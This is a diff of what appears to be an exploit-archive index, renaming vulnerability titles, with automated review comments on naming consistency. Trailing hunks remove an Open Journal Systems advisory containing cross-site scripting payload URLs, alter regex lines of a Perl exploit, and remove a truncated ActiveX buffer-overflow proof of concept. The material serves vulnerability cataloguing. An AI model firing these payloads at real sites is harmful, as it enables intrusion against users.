11550,platforms/php/webapps/11550.txt,"worksimple_1.3.2 - Multiple Vulnerabilities",2010-02-23,JIKO,php,webapps,0
11550,platforms/php/webapps/11550.txt,"WorkSimple 1.3.2 - Multiple Vulnerabilities",2010-02-23,JIKO,php,webapps,0
11551,platforms/php/webapps/11551.txt,"Softbiz Jobs - Multiple SQL Injections",2010-02-23,"Easy Laster",php,webapps,0
11553,platforms/php/webapps/11553.txt,"Tinypug 0.9.5 - Cross-Site Request Forgery (Password Change)",2010-02-23,AmnPardaz,php,webapps,0
11554,platforms/php/webapps/11554.txt,"QuickDev 4 PHP - Database Disclosure",2010-02-23,ViRuSMaN,php,webapps,0
@ -24319,7 +24319,7 @@ id,file,description,date,author,platform,type,port
15819,platforms/php/webapps/15819.txt,"Joomla! Component 'com_xmovie' 1.0 - Local File Inclusion",2010-12-24,KelvinX,php,webapps,0
15820,platforms/php/webapps/15820.txt,"SquareCMS 0.3.1 - (post.php) SQL Injection",2010-12-24,cOndemned,php,webapps,0
15822,platforms/php/webapps/15822.html,"CubeCart 3.0.6 - Cross-Site Request Forgery (Add Admin)",2010-12-24,"P0C T34M",php,webapps,0
15824,platforms/php/webapps/15824.txt,"Pligg 1.1.2 - Blind SQL Injection / Cross-Site Scripting",2010-12-25,"Michael Brooks",php,webapps,0
15824,platforms/php/webapps/15824.txt,"Pligg CMS 1.1.2 - Blind SQL Injection / Cross-Site Scripting",2010-12-25,"Michael Brooks",php,webapps,0
15825,platforms/php/webapps/15825.txt,"openauto 1.6.3 - Multiple Vulnerabilities",2010-12-25,"Michael Brooks",php,webapps,0
15826,platforms/php/webapps/15826.txt,"Traidnt Up 3.0 - Cross-Site Request Forgery",2010-12-25,"P0C T34M",php,webapps,0
15827,platforms/php/webapps/15827.txt,"Joomla! Component 'com_idoblog' - SQL Injection",2010-12-25,NOCKAR1111,php,webapps,0
@ -24563,7 +24563,7 @@ id,file,description,date,author,platform,type,port
16959,platforms/multiple/webapps/16959.txt,"Oracle WebLogic - Session Fixation Via HTTP POST",2011-03-11,"Roberto Suggi Liverani",multiple,webapps,0
16961,platforms/php/webapps/16961.py,"N_CMS 1.1E - Unauthenticated Local File Inclusion / Remote Code Exploit",2011-03-11,TecR0c,php,webapps,0
16962,platforms/asp/webapps/16962.txt,"SmarterStats 6.0 - Multiple Vulnerabilities",2011-03-11,"Hoyt LLC Research",asp,webapps,0
16963,platforms/php/webapps/16963.txt,"Constructr CMS 3.03 - MultipleRemote Vulnerabilities",2011-03-11,LiquidWorm,php,webapps,0
16963,platforms/php/webapps/16963.txt,"Constructr CMS 3.03 - Multiple Remote Vulnerabilities",2011-03-11,LiquidWorm,php,webapps,0
16968,platforms/php/webapps/16968.txt,"Cover Vision - SQL Injection",2011-03-13,Egyptian.H4x0rz,php,webapps,0
16969,platforms/php/webapps/16969.txt,"Log1 CMS 2.0 - Multiple Vulnerabilities",2011-03-14,Aodrulez,php,webapps,0
16975,platforms/asp/webapps/16975.txt,"SmarterMail 8.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-14,"Hoyt LLC Research",asp,webapps,0
@ -24706,7 +24706,7 @@ id,file,description,date,author,platform,type,port
17296,platforms/php/webapps/17296.txt,"NoticeBoardPro 1.0 - Multiple Vulnerabilities",2011-05-16,"AutoSec Tools",php,webapps,0
17297,platforms/php/webapps/17297.txt,"Jcow 4.2.1 - Local File Inclusion",2011-05-16,"AutoSec Tools",php,webapps,0
17299,platforms/php/webapps/17299.txt,"WordPress Plugin Is-human 1.4.2 - Remote Command Execution",2011-05-17,neworder,php,webapps,0
17301,platforms/php/webapps/17301.txt,"Pligg 1.1.4 - SQL Injection",2011-05-17,Null-0x00,php,webapps,0
17301,platforms/php/webapps/17301.txt,"Pligg CMS 1.1.4 - SQL Injection",2011-05-17,Null-0x00,php,webapps,0
17303,platforms/php/webapps/17303.txt,"Joomla! Component 'com_jdownloads' 1.0 - Arbitrary File Upload",2011-05-18,Al-Ghamdi,php,webapps,0
17307,platforms/php/webapps/17307.txt,"Ultimate PHP Board 2.2.7 - Broken Authentication and Session Management",2011-05-20,i2sec,php,webapps,0
17308,platforms/php/webapps/17308.txt,"Zen Cart 1.3.9h - Multiple Vulnerabilities",2011-05-20,"Dr. Alberto Fontanella",php,webapps,0
@ -25043,11 +25043,11 @@ id,file,description,date,author,platform,type,port
18013,platforms/windows/webapps/18013.py,"Cyclope Internet Filtering Proxy 4.0 - Persistent Cross-Site Scripting",2011-10-20,loneferret,windows,webapps,0
18018,platforms/php/webapps/18018.php,"SportsPHool 1.0 - Remote File Inclusion",2011-10-21,cr4wl3r,php,webapps,0
18020,platforms/php/webapps/18020.txt,"Jara 1.6 - SQL Injection",2011-10-23,muuratsalo,php,webapps,0
18021,platforms/php/webapps/18021.php,"phpLDAPadmin 1.2.1.1 - (query_engine) Remote PHP Code Injection (1)",2011-10-23,EgiX,php,webapps,0
18021,platforms/php/webapps/18021.php,"phpLDAPadmin 1.2.1.1 - Remote PHP Code Injection (1)",2011-10-23,EgiX,php,webapps,0
18022,platforms/php/webapps/18022.txt,"InverseFlow 2.4 - Cross-Site Request Forgery (Add Admin)",2011-10-23,"EjRaM HaCkEr",php,webapps,0
18042,platforms/php/webapps/18042.txt,"Joomla! Component Techfolio 1.0 - SQL Injection",2011-10-28,"Chris Russell",php,webapps,0
18046,platforms/php/webapps/18046.txt,"Joomla! Component Barter Sites 1.3 - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0
18031,platforms/php/webapps/18031.rb,"phpLDAPadmin 1.2.1.1 - (query_engine) Remote PHP Code Injection (Metasploit) (2)",2011-10-25,Metasploit,php,webapps,0
18031,platforms/php/webapps/18031.rb,"phpLDAPadmin 1.2.1.1 - Remote PHP Code Injection (Metasploit) (2)",2011-10-25,Metasploit,php,webapps,0
18032,platforms/windows/webapps/18032.rb,"SAP Management Console - OSExecute Payload Execution (Metasploit)",2011-10-24,Metasploit,windows,webapps,0
18035,platforms/php/webapps/18035.txt,"Online Subtitles Workshop - Cross-Site Scripting",2011-10-26,M.Jock3R,php,webapps,0
18036,platforms/php/webapps/18036.txt,"eFront 3.6.10 (build 11944) - Multiple Vulnerabilities",2011-10-27,EgiX,php,webapps,0
@ -26192,8 +26192,8 @@ id,file,description,date,author,platform,type,port
22599,platforms/php/webapps/22599.html,"vBulletin 3.0 - Private Message HTML Injection",2003-05-14,"Ferruh Mavituna",php,webapps,0
22600,platforms/php/webapps/22600.txt,"Owl Intranet Engine 0.7 - Authentication Bypass",2003-05-14,cdowns,php,webapps,0
22603,platforms/php/webapps/22603.txt,"PHP-Proxima - autohtml.php Information Disclosure",2003-05-14,"Mind Warper",php,webapps,0
22605,platforms/php/webapps/22605.txt,"OneOrZero Helpdesk 1.4 - TUpdate.php SQL Injection",2003-05-15,frog,php,webapps,0
22606,platforms/php/webapps/22606.py,"OneOrZero Helpdesk 1.4 - install.php Administrative Access",2003-05-15,frog,php,webapps,0
22605,platforms/php/webapps/22605.txt,"OneOrZero Helpdesk 1.4 - 'TUpdate.php' SQL Injection",2003-05-15,frog,php,webapps,0
22606,platforms/php/webapps/22606.py,"OneOrZero Helpdesk 1.4 - 'install.php' Administrative Access",2003-05-15,frog,php,webapps,0
22607,platforms/php/webapps/22607.txt,"EZ Publish 2.2 - 'index.php' IMG Tag Cross-Site Scripting",2003-05-16,"Ferruh Mavituna",php,webapps,0
22612,platforms/php/webapps/22612.txt,"ttCMS 2.2/2.3 - header.php Remote File Inclusion",2003-05-17,ScriptSlave@gmx.net,php,webapps,0
22618,platforms/php/webapps/22618.txt,"ttCMS 2.2/2.3 / ttForum 1.1 - 'index.php' Instant-Messages Preferences SQL Injection",2003-05-20,ScriptSlave@gmx.net,php,webapps,0
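Review bot: 22605 and 22606 are normalised under "OneOrZero Helpdesk 1.4", yet 7528 elsewhere in the file still reads "OneOrZero helpdesk 1.6.x. - Arbitrary File Upload", with a lower-case "helpdesk" and a stray period after the version, so the product appears under two spellings. Consider fixing 7528 in this patch. The file-name quoting added here also stops short of the context lines: 22603 "autohtml.php" and 22612 "header.php" remain unquoted.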
@ -28091,7 +28091,7 @@ id,file,description,date,author,platform,type,port
26207,platforms/php/webapps/26207.txt,"Land Down Under 700/701/800/801 - list.php Multiple Parameter SQL Injection",2005-08-29,matrix_killer,php,webapps,0
26208,platforms/php/webapps/26208.txt,"Autolinks 2.1 Pro - Al_initialize.php Remote File Inclusion",2005-08-29,4Degrees,php,webapps,0
26209,platforms/php/webapps/26209.txt,"PHP-Fusion 4.0/5.0/6.0 - BBCode URL Tag Script Injection",2005-08-29,slacker4ever_1,php,webapps,0
26211,platforms/php/webapps/26211.txt,"phpLDAPadmin 0.9.6/0.9.7 - welcome.php custom_welcome_page Variable Arbitrary File Inclusion",2005-08-30,rgod,php,webapps,0
26211,platforms/php/webapps/26211.txt,"phpLDAPadmin 0.9.6/0.9.7 - 'welcome.php' Arbitrary File Inclusion",2005-08-30,rgod,php,webapps,0
26212,platforms/php/webapps/26212.txt,"FlatNuke 2.5.6 - ID Parameter Directory Traversal",2005-08-31,rgod,php,webapps,0
26213,platforms/php/webapps/26213.txt,"LibrettoCMS 2.2.2 - Arbitrary File Upload",2013-06-14,"CWH Underground",php,webapps,0
26215,platforms/php/webapps/26215.txt,"FlatNuke 2.5.6 - USR Parameter Cross-Site Scripting",2005-08-31,rgod,php,webapps,0
@ -29251,12 +29251,12 @@ id,file,description,date,author,platform,type,port
27711,platforms/php/webapps/27711.txt,"ThWboard 3.0 - 'index.php' Cross-Site Scripting",2006-04-20,"CrAzY CrAcKeR",php,webapps,0
27712,platforms/cgi/webapps/27712.txt,"Portal Pack 6.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-20,r0t,cgi,webapps,0
27713,platforms/php/webapps/27713.txt,"Manic Web MWGuest 2.1 - MWguest.php HTML Injection",2006-04-20,"Aliaksandr Hartsuyeu",php,webapps,0
27717,platforms/php/webapps/27717.txt,"phpLDAPadmin 0.9.8 - compare_form.php dn Parameter Cross-Site Scripting",2006-04-21,r0t,php,webapps,0
27718,platforms/php/webapps/27718.txt,"phpLDAPadmin 0.9.8 - copy_form.php dn Parameter Cross-Site Scripting",2006-04-21,r0t,php,webapps,0
27719,platforms/php/webapps/27719.txt,"phpLDAPadmin 0.9.8 - rename_form.php dn Parameter Cross-Site Scripting",2006-04-21,r0t,php,webapps,0
27717,platforms/php/webapps/27717.txt,"phpLDAPadmin 0.9.8 - 'compare_form.php' Cross-Site Scripting",2006-04-21,r0t,php,webapps,0
27718,platforms/php/webapps/27718.txt,"phpLDAPadmin 0.9.8 - 'copy_form.php' Cross-Site Scripting",2006-04-21,r0t,php,webapps,0
27719,platforms/php/webapps/27719.txt,"phpLDAPadmin 0.9.8 - 'rename_form.php' Cross-Site Scripting",2006-04-21,r0t,php,webapps,0
33404,platforms/php/webapps/33404.txt,"phpFaber CMS 1.3.36 - 'module.php' Cross-Site Scripting",2009-12-14,bi0,php,webapps,0
27721,platforms/php/webapps/27721.txt,"phpLDAPadmin 0.9.8 - search.php scope Parameter Cross-Site Scripting",2006-04-21,r0t,php,webapps,0
27722,platforms/php/webapps/27722.txt,"phpLDAPadmin 0.9.8 - template_engine.php Multiple Parameter Cross-Site Scripting",2006-04-21,r0t,php,webapps,0
27721,platforms/php/webapps/27721.txt,"phpLDAPadmin 0.9.8 - 'search.php' Cross-Site Scripting",2006-04-21,r0t,php,webapps,0
27722,platforms/php/webapps/27722.txt,"phpLDAPadmin 0.9.8 - 'template_engine.php' Cross-Site Scripting",2006-04-21,r0t,php,webapps,0
27724,platforms/php/webapps/27724.txt,"Scry Gallery - Directory Traversal",2006-04-21,"Morocco Security Team",php,webapps,0
27725,platforms/php/webapps/27725.txt,"MKPortal 1.1 - Multiple Input Validation Vulnerabilities",2006-04-22,"Mustafa Can Bjorn IPEKCI",php,webapps,0
27726,platforms/php/webapps/27726.txt,"Simplog 0.9.3 - ImageList.php Cross-Site Scripting",2006-04-22,nukedx,php,webapps,0
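Review bot: the new titles for 27717, 27718 and 27719 drop "dn Parameter", 27721 drops "scope Parameter", and 27722 drops "Multiple Parameter", so the affected input can no longer be read from the title, while other renames in this patch add that detail (9710 becomes "'itemID' Parameter SQL Injection"). Suggest keeping the parameter in the quoted style, for example "'compare_form.php' 'dn' Parameter Cross-Site Scripting", or stating in the commit message that parameter names are being removed on purpose.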
@ -30943,7 +30943,7 @@ id,file,description,date,author,platform,type,port
30084,platforms/php/webapps/30084.php,"WordPress Plugin page-flip-image-gallery - Arbitrary File Upload",2013-12-06,"Ashiyane Digital Security Team",php,webapps,0
30086,platforms/php/webapps/30086.txt,"BoastMachine 3.1 - 'index.php' Cross-Site Scripting",2007-05-25,newbinaryfile,php,webapps,0
30087,platforms/php/webapps/30087.txt,"Digirez 3.4 - Multiple Cross-Site Scripting Vulnerabilities",2007-05-25,Linux_Drox,php,webapps,0
30088,platforms/php/webapps/30088.txt,"Pligg 9.5 - Reset Forgotten Password Security Bypass",2007-05-25,"242th section",php,webapps,0
30088,platforms/php/webapps/30088.txt,"Pligg CMS 9.5 - Reset Forgotten Password Security Bypass",2007-05-25,"242th section",php,webapps,0
30095,platforms/php/webapps/30095.txt,"DGNews 1.5.1/2.1 - news.php SQL Injection",2007-05-28,"Jesper Jurcenoks",php,webapps,0
30097,platforms/php/webapps/30097.txt,"UebiMiau 2.7.10 - demo/pop3/error.php selected_theme Parameter Cross-Site Scripting",2007-05-29,"Michal Majchrowicz",php,webapps,0
30098,platforms/php/webapps/30098.txt,"UebiMiau 2.7.10 - 'demo/pop3/error.php' Multiple Variable Full Path Disclosure",2007-05-29,"Michal Majchrowicz",php,webapps,0
@ -31322,7 +31322,7 @@ id,file,description,date,author,platform,type,port
30774,platforms/php/webapps/30774.txt,"Liferay Portal 4.1 Login Script - Cross-Site Scripting",2007-11-16,"Adrian Pastor",php,webapps,0
30775,platforms/asp/webapps/30775.txt,"JiRo's Banner System 2.0 - 'login.asp' Multiple SQL Injection",2007-11-17,"Aria-Security Team",asp,webapps,0
30777,platforms/cgi/webapps/30777.txt,"Citrix Netscaler 8.0 build 47.8 - Generic_API_Call.pl Cross-Site Scripting",2007-11-19,nnposter,cgi,webapps,0
30778,platforms/asp/webapps/30778.txt,"Click&BaneX - Details.asp SQL Injection",2007-11-19,"Aria-Security Team",asp,webapps,0
30778,platforms/asp/webapps/30778.txt,"Click&BaneX - 'Details.asp' SQL Injection",2007-11-19,"Aria-Security Team",asp,webapps,0
30975,platforms/cgi/webapps/30975.txt,"W3-mSQL - Error Page Cross-Site Scripting",2008-01-03,vivek_infosec,cgi,webapps,0
30976,platforms/php/webapps/30976.txt,"MyPHP Forum 3.0 - 'search.php' Multiple Unspecified SQL Injection",2008-01-03,The:Paradox,php,webapps,0
30977,platforms/php/webapps/30977.txt,"WordPress 2.2.3 - 'wp-admin/post.php' popuptitle Parameter Cross-Site Scripting",2008-01-03,3APA3A,php,webapps,0
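Review bot: the new 30778 title quotes the script name ('Details.asp'), but the neighbouring 30777 row still carries Generic_API_Call.pl unquoted, so the index keeps two conventions side by side. If the quoting pass is meant to be file-wide, pick up 30777 in the same change; otherwise say in the commit message that only touched rows are normalised.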
@ -31919,7 +31919,7 @@ id,file,description,date,author,platform,type,port
31724,platforms/php/webapps/31724.txt,"Alumni 1.0.8/1.0.9 - 'index.php' year Parameter Cross-Site Scripting",2008-05-02,hadihadi,php,webapps,0
31725,platforms/php/webapps/31725.txt,"Zen Cart 2008 - 'index.php' keyword Parameter SQL Injection",2008-05-02,"Ivan Sanchez",php,webapps,0
31726,platforms/php/webapps/31726.txt,"Zen Cart 2008 - 'index.php' keyword Parameter Cross-Site Scripting",2008-05-02,"Ivan Sanchez",php,webapps,0
31727,platforms/php/webapps/31727.txt,"ChiCoMaS 2.0.4 - 'index.php' Cross-Site Scripting",2008-05-02,"Hadi Kiamarsi",php,webapps,0
31727,platforms/php/webapps/31727.txt,"Chicomas 2.0.4 - 'index.php' Cross-Site Scripting",2008-05-02,"Hadi Kiamarsi",php,webapps,0
31729,platforms/php/webapps/31729.pl,"SiteXS CMS 0.1.1 - 'upload.php' Arbitrary File Upload",2008-05-03,"Hadi Kiamarsi",php,webapps,0
31730,platforms/php/webapps/31730.txt,"GEDCOM_TO_MYSQL - PHP/prenom.php Multiple Parameter Cross-Site Scripting",2008-05-05,ZoRLu,php,webapps,0
31731,platforms/php/webapps/31731.txt,"GEDCOM_TO_MYSQL - PHP/index.php nom_branche Parameter Cross-Site Scripting",2008-05-05,ZoRLu,php,webapps,0
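Review bot: row 31727 changes the product name from ChiCoMaS to Chicomas, a casing-only edit that makes case-sensitive title searches for the old spelling miss this entry. Confirm which spelling the vendor uses before merging, and keep the index and 31727.txt on the same one.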
@ -32194,7 +32194,7 @@ id,file,description,date,author,platform,type,port
32139,platforms/php/webapps/32139.txt,"freeForum 1.7 - 'acuparam' Parameter Cross-Site Scripting",2008-08-01,ahmadbady,php,webapps,0
32140,platforms/php/webapps/32140.txt,"PHP-Nuke Book Catalog Module 1.0 - 'catid' Parameter SQL Injection",2008-08-01,"H4ckCity Security Team",php,webapps,0
32141,platforms/php/webapps/32141.txt,"Homes 4 Sale - 'results.php' Cross-Site Scripting",2008-08-04,"Ghost Hacker",php,webapps,0
32142,platforms/php/webapps/32142.php,"Pligg 9.9.5 - 'CAPTCHA' Registration Automation Security Bypass",2008-08-02,"Micheal Brooks",php,webapps,0
32142,platforms/php/webapps/32142.php,"Pligg CMS 9.9.5 - 'CAPTCHA' Registration Automation Security Bypass",2008-08-02,"Micheal Brooks",php,webapps,0
32143,platforms/php/webapps/32143.txt,"Keld PHP-MySQL News Script 0.7.1 - 'login.php' SQL Injection",2008-08-04,crimsoN_Loyd9,php,webapps,0
32144,platforms/php/webapps/32144.txt,"Meeting Room Booking System (MRBS) 1.2.6 - 'day.php' Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0
32145,platforms/php/webapps/32145.txt,"Meeting Room Booking System (MRBS) 1.2.6 - 'week.php' Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0
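Review bot: the author field on row 32142 reads "Micheal Brooks" in both the old and the new version of the line, which looks like a transposition of "Michael". Since the row is being rewritten for the Pligg CMS rename anyway, check the credit against 32142.php and correct it in the same edit if it is a typo.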
@ -33270,7 +33270,7 @@ id,file,description,date,author,platform,type,port
34109,platforms/php/webapps/34109.html,"log1 CMS 2.0 - Session Handling Remote Security Bypass / Remote File Inclusion",2010-06-03,"High-Tech Bridge SA",php,webapps,0
34110,platforms/php/webapps/34110.txt,"PG Auto Pro - SQL Injection / Cross-Site Scripting",2010-06-09,Sid3^effects,php,webapps,0
34111,platforms/multiple/webapps/34111.txt,"GREEZLE - Global Real Estate Agent Login Multiple SQL Injection",2010-06-09,"L0rd CrusAd3r",multiple,webapps,0
34339,platforms/php/webapps/34339.txt,"Pligg 1.0.4 - 'search.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0
34339,platforms/php/webapps/34339.txt,"Pligg CMS 1.0.4 - 'search.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0
34124,platforms/php/webapps/34124.txt,"WordPress Plugin WP BackupPlus - Database And Files Backup Download",2014-07-20,pSyCh0_3D,php,webapps,0
34130,platforms/linux/webapps/34130.rb,"Raritan PowerIQ 4.1.0 - SQL Injection (Metasploit)",2014-07-21,"Brandon Perry",linux,webapps,80
34127,platforms/php/webapps/34127.txt,"Arab Portal 2.2 - 'members.php' SQL Injection",2010-06-10,SwEET-DeViL,php,webapps,0
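Review bot: row 34339 sits between 34111 and 34124, and 34130 comes before 34127, so this stretch of the index is not in id order. The rename itself is fine, but as 34339 is being rewritten here, either move it to its sorted position or document the intended sort key so that later diffs of this file stay readable.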
@ -33281,7 +33281,7 @@ id,file,description,date,author,platform,type,port
34163,platforms/hardware/webapps/34163.txt,"Lian Li NAS - Multiple Vulnerabilities",2014-07-24,pws,hardware,webapps,0
34165,platforms/multiple/webapps/34165.txt,"Zenoss Monitoring System 4.2.5-2108 (x64) - Persistent Cross-Site Scripting",2014-07-25,"Dolev Farhi",multiple,webapps,0
34166,platforms/php/webapps/34166.txt,"KubeSupport - 'lang' Parameter SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0
34168,platforms/php/webapps/34168.py,"Pligg 2.0.1 - Multiple Vulnerabilities",2014-07-25,BlackHawk,php,webapps,80
34168,platforms/php/webapps/34168.py,"Pligg CMS 2.0.1 - Multiple Vulnerabilities",2014-07-25,BlackHawk,php,webapps,80
34169,platforms/php/webapps/34169.txt,"Moodle 2.7 - Persistent Cross-Site Scripting",2014-07-27,"Osanda Malith",php,webapps,0
34170,platforms/php/webapps/34170.txt,"ZeroCMS 1.0 - Persistent Cross-Site Scripting",2014-07-27,"Mayuresh Dani",php,webapps,0
34173,platforms/php/webapps/34173.txt,"DirPHP 1.0 - Local File Inclusion",2014-07-27,"black hat",php,webapps,0
@ -35085,11 +35085,10 @@ id,file,description,date,author,platform,type,port
36992,platforms/php/webapps/36992.txt,"Wing FTP Server Admin 4.4.5 - Cross-Site Request Forgery (Add User)",2015-05-11,hyp3rlinx,php,webapps,0
36993,platforms/php/webapps/36993.txt,"SQLBuddy 1.3.3 - Directory Traversal",2015-05-11,hyp3rlinx,php,webapps,0
36997,platforms/php/webapps/36997.txt,"CMSimple 3.3 - 'index.php' Cross-Site Scripting",2012-03-21,"Stefan Schurtz",php,webapps,0
36998,platforms/php/webapps/36998.txt,"Open Journal Systems (OJS) 2.3.6 - /lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/ibrowser.php Multiple Parameter Cross-Site Scripting",2012-03-21,"High-Tech Bridge",php,webapps,0
36999,platforms/php/webapps/36999.txt,"Open Journal Systems (OJS) 2.3.6 - 'index.php' authors[][url] Parameter Cross-Site Scripting",2012-03-21,"High-Tech Bridge",php,webapps,0
37000,platforms/php/webapps/37000.txt,"Open Journal Systems (OJS) 2.3.6 - /lib/pkp/classes/core/String.inc.php String::stripUnsafeHtml() Method Cross-Site Scripting",2012-03-21,"High-Tech Bridge",php,webapps,0
37001,platforms/php/webapps/37001.txt,"Open Journal Systems (OJS) 2.3.6 - Multiple Script Arbitrary File Upload",2012-03-21,"High-Tech Bridge",php,webapps,0
37002,platforms/php/webapps/37002.txt,"Open Journal Systems (OJS) 2.3.6 - /lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/rfiles.php Multiple Function Traversal Arbitrary File Manipulation",2012-03-21,"High-Tech Bridge",php,webapps,0
37002,platforms/php/webapps/37002.txt,"Open Journal Systems (OJS) 2.3.6 - 'rfiles.php' Traversal Arbitrary File Manipulation",2012-03-21,"High-Tech Bridge",php,webapps,0
37003,platforms/php/webapps/37003.txt,"WordPress Plugin Booking Calendar Contact Form 1.0.2 - Multiple Vulnerabilities",2015-05-13,"i0akiN SEC-LABORATORY",php,webapps,0
37004,platforms/php/webapps/37004.txt,"PHPCollab 2.5 - (deletetopics.php) SQL Injection",2015-05-13,Wadeek,php,webapps,0
37008,platforms/php/webapps/37008.txt,"Event Calendar PHP - 'cal_year' Parameter Cross-Site Scripting",2012-03-24,3spi0n,php,webapps,0
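Review bot: the header (-35085,11 +35085,10) drops one row net, and 36998 (the ibrowser.php cross-site scripting entry) appears to be the one removed, which matches the ibrowser.php advisory file deleted further down in this commit. Nothing in the hunk records which remaining entry supersedes it, so anyone holding a reference to id 36998 ends up with a dead pointer. Name the surviving entry in the commit message, and consider keeping the script path in the shortened 37002 title context so the two OJS tinymce issues remain distinguishable.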
@ -35116,7 +35115,7 @@ id,file,description,date,author,platform,type,port
37031,platforms/java/webapps/37031.txt,"ManageEngine Firewall Analyzer 7.2 - fw/mindex.do url Parameter Cross-Site Scripting",2012-04-01,"Vulnerability Research Laboratory",java,webapps,0
37032,platforms/java/webapps/37032.txt,"ManageEngine Firewall Analyzer 7.2 - fw/syslogViewer.do port Parameter Cross-Site Scripting",2012-04-01,"Vulnerability Research Laboratory",java,webapps,0
37033,platforms/java/webapps/37033.txt,"JBMC Software DirectAdmin 1.403 - 'domain' Parameter Cross-Site Scripting",2012-04-02,"Dawid Golak",java,webapps,0
37034,platforms/php/webapps/37034.txt,"FlatnuX CMS - controlcenter.php contents/Files Action dir Parameter Traversal Arbitrary File Access",2012-04-01,"Vulnerability Laboratory",php,webapps,0
37034,platforms/php/webapps/37034.txt,"FlatnuX CMS - Traversal Arbitrary File Access",2012-04-01,"Vulnerability Laboratory",php,webapps,0
37035,platforms/php/webapps/37035.html,"FlatnuX CMS - Cross-Site Request Forgery (Add Admin)",2012-04-01,"Vulnerability Laboratory",php,webapps,0
37038,platforms/php/webapps/37038.txt,"osCMax 2.5 - admin/login.php 'Username' Parameter Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps,0
37039,platforms/php/webapps/37039.txt,"osCMax 2.5 - admin/htaccess.php Multiple Parameter Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps,0
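Review bot: the new 37034 title ("FlatnuX CMS - Traversal Arbitrary File Access") loses both the affected script (controlcenter.php) and the dir parameter, which are what a defender would grep for when triaging. Other rows in this commit keep the script as a quoted name (for example 'rfiles.php' and 'Details.asp'); doing the same here, with 'controlcenter.php' quoted, would shorten the title without discarding the locator.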
@ -36935,4 +36934,4 @@ id,file,description,date,author,platform,type,port
40979,platforms/php/webapps/40979.php,"Zend Framework / zend-mail < 2.4.11 - Remote Code Execution",2016-12-30,"Dawid Golunski",php,webapps,0
40982,platforms/hardware/webapps/40982.html,"Xfinity Gateway (Technicolor DPC3941T) - Cross-Site Request Forgery",2016-08-09,"Ayushman Dutta",hardware,webapps,0
40986,platforms/php/webapps/40986.py,"PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - (AIO) 'PwnScriptum' Remote Code Execution",2017-01-02,"Dawid Golunski",php,webapps,0
40989,platforms/jsp/webapps/40989.txt,"Atlassian Confluence Jira 5.9.12 - Persistent Cross-Site Scripting",2017-01-04,"Jodson Santos",jsp,webapps,0
40989,platforms/jsp/webapps/40989.txt,"Atlassian Confluence 5.9.12 - Persistent Cross-Site Scripting",2017-01-04,"Jodson Santos",jsp,webapps,0
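Review bot: on row 40989 the title goes from "Atlassian Confluence Jira 5.9.12" to "Atlassian Confluence 5.9.12", which changes the stated affected product rather than just the formatting. Check 40989.txt to confirm the advisory covers Confluence only; if Jira integration is part of the affected configuration, that should stay visible in the title.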


@ -1,15 +0,0 @@
source: http://www.securityfocus.com/bid/52666/info
Open Journal Systems is prone to following multiple vulnerabilities because the software fails to sufficiently sanitize user-supplied input:
1. An arbitrary-file-deletion vulnerability
2. A security vulnerability
3. An arbitrary-file-upload vulnerability
4. Multiple cross-site scripting vulnerabilities
An attacker may leverage these issues to execute arbitrary script code, upload arbitrary files, and execute arbitrary code with administrative privileges. These issues may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Open Journal Systems 2.3.6 is vulnerable; other versions may also be affected.
http://www.example.com/lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/ibrowser.php?editor=z&callb ack=x;};};alert%2834%29;{{&lang=en
http://www.example.com/lib/pkp/lib/tinymce/jscripts/tiny_mce/plugin s/ibrowser/ibrowser.php?editor=%27%29;};};alert%2834%29;{{a=x%28%27&callback=iBrowser_callback&a mp;lang=en


@ -111,10 +111,10 @@ else
if ( $data->content =~ /<textarea(.*)>(.*)<\/textarea>/is )
{
$temp = $2;
$temp =~ s/&gt;/>/ig;
$temp =~ s/&lt;/</ig;
$temp =~ s/&quot;/"/ig;
$temp =~ s/&amp;/&/ig;
$temp =~ s/>/>/ig;
$temp =~ s/</</ig;
$temp =~ s/"/"/ig;
$temp =~ s/&/&/ig;
print "[+] Got template data ...\n";
}
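Review bot: as rendered, the last four substitutions in this hunk (s/>/>/ig, s/</</ig, s/"/"/ig, s/&/&/ig) replace each character with itself and therefore do nothing, while the first four are the ones that turn &gt;, &lt;, &quot; and &amp; back into characters. This looks like an entity-unescaping pass over the file that also rewrote the literals inside the regex bodies. Exclude regex and string literals from that pass, and compare the stored file byte for byte with this rendering before merging, since the page view may itself have unescaped one level.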


@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/32814/info
Evans FTP ActiveX control is prone to multiple remote buffer-overflow vulnerabilities because the application fails to perform adequate boundary checks on user-supplied data.
Successfully exploiting these issues allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts will likely result in denial-of-service conditions.
<HTML> <package><job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:7E864D3E-3E6A-48F0-88AF-CEAEE322F9FD' id='beard' /> <HEAD> <TITLE>EvansFTP (EvansFTP.ocx) Remote Buffer Overflow PoC</TITLE> </HEAD> <BODY> [+] Application : EvansFTP ActiveX <br> [+] CompanyName : Evans Programming <br> [+] Description : Multi-threaded asynchronus Active-X FTP Control<br> [+] Lib GUID : {DA3C77F4-8701-11D4-908B-00010268221D}<br> [+] Exploit : Remote BoF (PoC)<br> [+] Author : Bl@ckbe@rD // Blackbeard-sql{a.t}Hotmail{dot}fr<br><br> [+] Object Safety Report :<br> Report for Clsid: {7E864D3E-3E6A-48F0-88AF-CEAEE322F9FD}<br> RegKey Safe for Script: Faux<br> RegKey Safe for Init: Faux<br> Implements IObjectSafety: Vrai<br> IDisp Safe: Safe for untrusted: caller,data <br> IPStorage Safe: Safe for untrusted: caller,data <br><br> RegKey Safe for Script: Faux<br> RegkeySafe for Init: Faux<br> KillBitSet: Faux<br> <br><br> The Proprieties 